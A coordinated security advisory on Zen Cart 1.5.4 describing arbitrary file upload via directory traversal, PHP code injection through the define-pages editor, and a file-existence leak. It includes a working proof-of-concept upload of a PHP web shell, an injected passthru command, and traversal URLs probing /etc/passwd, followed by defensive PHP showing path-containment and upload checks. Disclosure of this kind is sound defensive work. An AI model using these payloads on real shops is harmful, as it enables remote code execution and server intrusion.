Zen Cart 1.5.4: Code Execution and Information Leak
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Zen Cart 1.5.4
Fixed in: partial fix via patch
Partial Patch Link: https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included
Vendor Contact: security@zen-cart.com
Vulnerability Type: Code Execution and Information Leak
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH
2. Vulnerability Description: Arbitrary File Upload

When uploading an image for a record, there is no check on the type or extension of the file, with the exception that it cannot be an htaccess file. Uploaded files are stored in the /image directory, which is protected from code execution via an htaccess file, but only if the server is configured to parse htaccess files (parsing is sometimes disabled, for example for speed and security reasons).

An attacker can perform a directory traversal via the img_dir POST parameter to store an uploaded file outside of this protected directory, thus gaining code execution or overwriting sensitive files, even if the image directory itself is protected by the htaccess file.

The recommendations for denying code execution listed in the help page "Important Site Security Recommendations" - such as protecting the /image and /html_includes folders against file modification and execution - do not protect against code execution via this attack.

This problem exists for other classes performing file operations as well, such as media_manager.php, manufacturers.php, attributes_controller.php, mail.php, new_product_preview.php, record_company.php, product_types.php, and categories.php.

Please note that an admin account is required which has the right to edit one of the items that provide an image upload, such as the right "Catalog: Product Types" or "Extra: Record Artists".
3. Proof of Concept: Arbitrary File Upload

The request to upload a file may look like this (the multipart Content-Type header, whose boundary follows from the delimiter lines in the body, is shown so the request is well-formed):

POST /zen-cart-v1.5.4-12302014/admin2/record_artists.php?page=1&mID=1&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=--------1358192638

----------1358192638
Content-Disposition: form-data; name="securityToken"

30bb3768c3aa1120ccae02eca8ec8a4b
----------1358192638
Content-Disposition: form-data; name="artists_name"

The Russ Tippins Band
----------1358192638
Content-Disposition: form-data; name="artists_image"; filename="test.php"
Content-Type: application/x-php

<?php
passthru($_GET['x']);
----------1358192638
Content-Disposition: form-data; name="img_dir"

dvd/../../
----------1358192638
Content-Disposition: form-data; name="artists_url[1]"

www.russtippins.com/
----------1358192638
Content-Disposition: form-data; name="x"

37
----------1358192638
Content-Disposition: form-data; name="y"

9
----------1358192638--
4. Further

Code Execution

With an admin account that has the right "Tools: Define Pages Editor", it is possible to edit a limited number of PHP files, which mainly contain HTML, at:
http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=4&action=new_page

Execution of these files is prohibited via htaccess files, so with a correct server configuration the intention seems to be that an attacker should not be able to gain code execution via this editor. However, this protection is insufficient, as any injected code is executed once the file is included by another script. For example:

1. Visit http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=8&action=new_page
2. Add <?php passthru($_GET['e']); ?>
3. Visit http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=nonexistent&cPath=2&e=ls%20-alF

Please note that if the user followed the guide "Important Site Security Recommendations", they will have set these files to read-only, disallowing code execution.
Information Leak

Via a directory traversal in the products_image_large_additional parameter, an attacker can check whether a file exists on the server, thus gaining information about installed software. Viewing the contents of the file is not possible.

Example:

http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd

results in

<a href="javascript:window.close()"><img src="../../../../../../../etc/passwd"

whereas

http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd2

results in the default image being shown.
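Both the upload issue in section 2 and the file-existence leak above come down to the same missing check: a client-supplied path fragment is joined onto the images directory without confirming that the result still lies inside it. The PHP below is an added illustration of how that containment check and an upload allowlist could be written; it is not Zen Cart's code and not the vendor's patch. The function names (resolveInsideBase, safeImageDestination, additionalImageSrc), the $imageBase parameter and the sample paths are assumptions made for this example.

```php
<?php
// Added example, not Zen Cart's own code and not the vendor's patch.
// Assumed names: resolveInsideBase, safeImageDestination, additionalImageSrc,
// and $imageBase (the absolute filesystem path of the shop's images directory).

/**
 * Canonicalise $relative below $base. Returns the absolute path, or null when
 * the result would lie outside $base (via "..", symlinks or an absolute path).
 * Upload targets do not exist yet, so for those the parent directory is
 * canonicalised and the final component appended afterwards.
 */
function resolveInsideBase(string $base, string $relative): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || strpos($relative, "\0") !== false) {
        return null; // no base directory, or a NUL byte that would truncate the path
    }
    $candidate = $baseReal . DIRECTORY_SEPARATOR . ltrim($relative, '/\\');
    $real = realpath($candidate);
    if ($real === false) {
        $leaf = basename($candidate);
        $parent = realpath(dirname($candidate));
        if ($parent === false || $leaf === '.' || $leaf === '..') {
            return null; // fail closed when the parent cannot be resolved
        }
        $real = $parent . DIRECTORY_SEPARATOR . $leaf;
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if ($real === $baseReal || strncmp($real, $prefix, strlen($prefix)) === 0) {
        return $real;
    }
    return null; // "dvd/../../" and "../../../etc/passwd" both end up here
}

/**
 * Validate an uploaded image and compute where to store it: extension
 * allowlist, content sniffing with finfo (the extension alone is spoofable),
 * and a destination directory confined to $imageBase. $file is one entry of
 * $_FILES. Throws on any violation instead of silently falling back.
 */
function safeImageDestination(string $imageBase, string $imgDir, array $file): string
{
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException("extension '$ext' is not an allowed image type");
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException('file content does not match its extension');
    }
    $dir = resolveInsideBase($imageBase, $imgDir);
    if ($dir === null || !is_dir($dir)) {
        throw new RuntimeException('img_dir resolves outside the images directory');
    }
    // Reduce the client-supplied stem to a conservative character set. Dots are
    // replaced too, so "shell.php.jpg" becomes "shell_php.jpg" and no inner
    // extension survives for a permissive handler mapping to pick up.
    $stem = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo($file['name'], PATHINFO_FILENAME));
    if ($stem === '') {
        $stem = 'image';
    }
    return $dir . DIRECTORY_SEPARATOR . $stem . '.' . $ext;
}

/**
 * Compute the src attribute for the popup_image_additional page. The
 * containment check runs before is_file(), so a request that escapes
 * $imageBase gets the same default image whether or not the target exists,
 * which removes the file-existence oracle.
 */
function additionalImageSrc(string $imageBase, string $requested, string $default): string
{
    $real = resolveInsideBase($imageBase, $requested);
    if ($real === null || !is_file($real)) {
        return $default;
    }
    // Re-derive the web path from the canonical file path, never from the input.
    $relative = substr($real, strlen(realpath($imageBase)) + 1);
    return 'images/' . strtr($relative, DIRECTORY_SEPARATOR, '/');
}

// Constructed usage; $imageBase must be an existing directory on the host.
$imageBase = __DIR__ . '/images';
var_dump(resolveInsideBase($imageBase, 'dvd/../../'));   // NULL: traversal rejected
// Same default image for /etc/passwd and /etc/passwd2, so existence is no longer observable.
var_dump(additionalImageSrc($imageBase, '../../../../../../../etc/passwd', 'images/default.png'));
var_dump(additionalImageSrc($imageBase, '../../../../../../../etc/passwd2', 'images/default.png'));
```

The containment check deliberately goes through realpath() rather than string-stripping ".." so that symlinks and mixed separators are handled by the filesystem; everything that cannot be resolved is rejected rather than guessed at. Application-level checks of this kind complement, rather than replace, the htaccess and read-only-file protections the advisory refers to.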
5. Solution

To mitigate the information leak a patch can be used:
https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included

The Arbitrary File Upload vulnerability has not been fixed yet.

6. Report Timeline

08/13/2015 Informed Vendor about Issue
09/12/2015 Vendor releases report and partial fix
09/14/2015 Disclosed to public

7. Blog Reference:
http://blog.curesec.com/article/blog/Zen-Cart-154-Code-Execution-and-Information-Leak-54.html